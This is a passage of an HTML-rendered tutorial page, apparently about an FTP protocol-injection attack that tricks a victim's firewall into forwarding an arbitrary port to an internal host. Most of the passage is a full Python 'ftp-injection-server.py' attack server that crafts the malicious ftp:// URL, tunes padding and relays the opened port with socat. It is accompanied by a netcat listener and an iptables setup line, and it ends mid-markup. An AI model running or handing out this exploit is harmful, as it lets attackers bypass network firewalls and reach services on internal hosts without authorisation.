class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ wrap the urlconnection in a bufferedreader<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485aa474970415-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">BufferedReader <\/span><span class=\"crayon-v\">bufferedReader<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">BufferedReader<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">InputStreamReader<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">urlConnection<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getInputStream<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485aa474970415-32\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485aa474970415-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">line<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485aa474970415-34\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485aa474970415-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ read from the urlconnection via the bufferedreader<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485aa474970415-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">while<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">line<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bufferedReader<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">readLine<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485aa474970415-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485aa474970415-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">append<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">line<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;n&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485aa474970415-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485aa474970415-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">bufferedReader<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485aa474970415-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485aa474970415-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">Exception<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485aa474970415-43\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485aa474970415-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485aa474970415-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485aa474970415-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485aa474970415-47\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485aa474970415-48\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0039 seconds] -->  <\/p>\n<p>The Victim Target (VT) host should run service to observe when the <em>Attacker Server (EAS)<\/em> system connects to it:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce4485bc427844802\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> nc -l -p 12345<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485bc427844802-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce4485bc427844802-1\"><span class=\"crayon-v\">nc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">l<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">12345<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<p>Whatever TCP port is chosen for this should be one that the Victim Firewall (VF) doesn&#8217;t ordinarily forward to the Victim Target (VT). It should also be a &#8220;high&#8221; port (>=1024).<\/p>\n<p><u>Attacker Server (EAS) Setup<\/u><br \/> The Attacker Server (EAS) system will need a bit of configuration as well. Copy the following script (we will name him <em>ftp-injection-server.py<\/em>) to The Attacker Server (EAS) and be sure you are logged in as root.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce4485be518342985\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/env python3      import sys  import os  import time  import random  import argparse  import binascii  import traceback  import struct  import socket  import threading  import subprocess  import urllib  import urllib.parse    parser = argparse.ArgumentParser(description=&#8221;&#8221;)    parser.add_argument(&#8216;public_ip&#8217;, default=None,                      help=&#8217;IP address the client can reach you at.&#8217;)  parser.add_argument(&#8216;internal_ip&#8217;, default=None,                      help=&#8217;The victim host&#8217;s internal IP address.&#8217;)  parser.add_argument(&#8216;target_port&#8217;, type=int, default=None,                      help=&#8217;TCP port you want to fool the firewall into forwarding. Must be in the range [1024..65535].&#8217;)  parser.add_argument(&#8216;&#8211;port&#8217;, type=int, default=21,                      help=&#8217;TCP port to listen on (default: 21).&#8217;)  parser.add_argument(&#8216;&#8211;ip&#8217;, dest=&#8217;ip&#8217;, type=str, default=&#8217;0.0.0.0&#8242;,                      help=&#8217;Local IP address to listen on (default: 0.0.0.0).&#8217;)    # Run this first to clamp down the MSS:  # iptables -A OUTPUT -p tcp &#8211;tcp-flags SYN,RST SYN &#8211;sport 21 -j TCPMSS &#8211;set-mss 536  #     options = parser.parse_args()    QUIT = 0    NL = &#8216;n&#8217;    def generateURL(pad_len):      global options            octets = options.internal_ip.split(&#8216;.&#8217;)      octets.extend([&#8220;%d&#8221; % (options.target_port\/256),                     &#8220;%d&#8221; % (options.target_port%256)])      port_cmd = &#8220;PORT%20&#8243;+(&#8216;,&#8217;.join(octets))      padding = &#8220;X&#8221;*pad_len      newline = urllib.parse.quote(NL)      url_template = &#8220;ftp:\/\/x:y@%s\/leet%s%s%s\/z.txt&#8221;            return url_template % (options.public_ip, padding, newline, port_cmd)      def ftpSession(clientSock, stream_id):      clientSock.sendall(b&#8217;220 Port Opener Expressrn&#8217;)      next_command = &#8221;      while not QUIT:          command = &#8221;          if next_command:              command = next_command              next_command = &#8221;          else:              while not command:                  try:                      command = clientSock.recv(536, socket.MSG_DONTWAIT)                  except BlockingIOError as e:                      pass          sys.stderr.write(&#8220;&gt;&gt; %s&#8221; % command.decode(&#8216;utf-8&#8242;))                    if command[0:4].upper() == b&#8217;USER&#8217;:              clientSock.sendall(b&#8217;331 Papers pleasern&#8217;)          elif command[0:4].upper() == b&#8217;PASS&#8217;:              clientSock.sendall(b&#8217;250 OKrn&#8217;)          elif command[0:3].upper() == b&#8217;CWD&#8217;:              if b&#8217;nP&#8217; in command:                  sys.stderr.write(&#8220;ERROR: not enough padding to isolate correct padding lengthn&#8221;)                  break              elif command[-1:] == b&#8217;n&#8217;:                  sys.stderr.write(&#8220;Correct padding!n&#8221;)                  clientSock.sendall(b&#8217;250 Directory changedrn&#8217;)              else:                  sys.stderr.write(&#8220;Payload size appears to be: %dn&#8221; % len(command))                  new_url = generateURL(len(command)-len(NL)-8) # 8 for &#8220;CWD leet&#8221;                  print(&#8220;Try this URL instead:&#8221;)                  print(new_url)                  break          elif command[0:4].upper() == b&#8217;PORT&#8217;:              command,next_command = command.split(b&#8217;rn&#8217;)              octets = command[5:].decode(&#8216;utf-8&#8217;).split(&#8216;,&#8217;)              ip = &#8216;.&#8217;.join(octets[0:4])              port = int(octets[4])*256+int(octets[5])              sys.stderr.write(&#8220;Client has opened %s:%dn&#8221; % (ip,port))              clientSock.sendall(b&#8217;200 PORT command successful.rn&#8217;)              local_port = random.randint(31337,41337)              relay_cmd = [&#8216;socat&#8217;, &#8216;tcp4-connect:%s:%d&#8217; % (ip,port), &#8216;tcp4-listen:%d,bind=127.0.0.1&#8242; % local_port]              print(&#8220;Setting up relay on 127.0.0.1:%d; connect to this to access the targeted service&#8221; % local_port)              child = subprocess.call(relay_cmd, stdin=subprocess.DEVNULL, stderr=subprocess.STDOUT)              print(&#8220;Relay finished.&#8221;)              break          elif command[0:4].upper() == b&#8217;TYPE&#8217;:              clientSock.sendall(b&#8217;250 Switching to Binary mode.rn&#8217;)          elif command[0:4].upper() == b&#8217;EPSV&#8217;:              clientSock.sendall(b&#8217;500 Command not understood.rn&#8217;)          elif command[0:4].upper() == b&#8217;PASV&#8217;:              clientSock.sendall(b&#8217;500 Command not understood.rn&#8217;)          elif command[0:4].upper() == b&#8217;EPRT&#8217;:               clientSock.sendall(b&#8217;200 EPRT command successful.rn&#8217;)          else:              print(&#8220;Unknown command:&#8221;, command)              break      print(&#8220;Closing control channel.&#8221;)      clientSock.close()    print(&#8220;First try to give the vulnerable host this URL:&#8221;)  print(generateURL(2000))      threads = []  listenSock = socket.socket()  listenSock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  listenSock.bind((options.ip, options.port))  listenSock.listen(100)    try:      while 1:          try:              (clientSock, clientAddr) = listenSock.accept()              sys.stderr.write(&#8220;Connection received from %s:%s.n&#8221; % clientAddr)              clientSock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)              clientSock.setsockopt(socket.IPPROTO_TCP, socket.TCP_WINDOW_CLAMP, 1)            except Exception as e:              print(&#8220;Exception while listening: &#8220;, e)              traceback.print_exc(e)              continue          except KeyboardInterrupt as e:              QUIT=1              break            now = int(time.time())          clientSrcPort = clientAddr[1]          stream_id = &#8220;%d.%d&#8221; % (now, clientSrcPort)            t = threading.Thread(target=ftpSession,                               args=(clientSock, stream_id))          threads.append(t)          t.start()    except Exception as e:      sys.stderr.write(&#8220;Unexpected exception: %sn&#8221; % repr(e))    listenSock.close()      QUIT=1  for t in threads:      t.join()    sys.exit(0)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-98\">98<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-99\">99<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-100\">100<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-101\">101<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-102\">102<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-103\">103<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-104\">104<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-105\">105<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-106\">106<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-107\">107<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-108\">108<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-109\">109<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-110\">110<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-111\">111<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-112\">112<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-113\">113<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-114\">114<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-115\">115<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-116\">116<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-117\">117<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-118\">118<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-119\">119<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485be518342985-120\">120<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485be518342985-121\">121<\/div>\n<div class=\"crayon-num 